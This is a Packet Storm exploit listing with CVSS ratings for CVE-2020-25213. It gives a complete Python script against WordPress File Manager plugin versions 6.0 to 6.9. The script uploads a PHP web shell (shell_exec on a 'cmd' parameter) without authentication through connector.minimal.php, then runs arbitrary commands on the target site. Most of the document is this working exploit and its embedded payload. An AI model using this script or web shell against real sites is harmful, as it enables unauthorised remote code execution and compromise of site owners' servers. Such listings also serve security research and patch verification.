Lucene search

K
packetstormBLYPACKETSTORM:171650
HistoryApr 03, 2023 - 12:00 a.m.

WordPress File Manager 6.9 Shell Upload

2023-04-0300:00:00
BLY
packetstormsecurity.com
174

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

`#!/usr/bin/env  
  
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE  
# Date: [ 22-01-2023 ]  
# Exploit Author: [BLY]  
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]  
# Version: [ File Manager plugin 6.0-6.9]  
# Tested on: [ Debian ]  
# CVE : [ CVE-2020-25213 ]  
  
import sys,signal,time,requests  
from bs4 import BeautifulSoup  
#from pprint import pprint  
  
def handler(sig,frame):  
print ("[!]Saliendo")  
sys.exit(1)  
  
signal.signal(signal.SIGINT,handler)  
  
def commandexec(command):  
  
exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"  
params = {  
"cmd":command  
}  
  
r=requests.get(exec_url,params=params)  
  
soup = BeautifulSoup(r.text, 'html.parser')  
text = soup.get_text()  
  
print (text)  
def exploit():  
  
global url  
  
url = sys.argv[1]  
command = sys.argv[2]  
upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"  
  
headers = {  
'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",  
'Connection': "close"   
}  
  
payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"  
  
try:  
r=requests.post(upload_url,data=payload,headers=headers)  
#pprint(r.json())  
commandexec(command)  
except:  
print("[!] Algo ha salido mal...")  
  
  
  
  
def help():  
  
print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")  
print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")  
  
  
  
  
if __name__ == '__main__':  
  
if len(sys.argv) != 3:  
help()  
  
else:  
exploit()  
  
  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P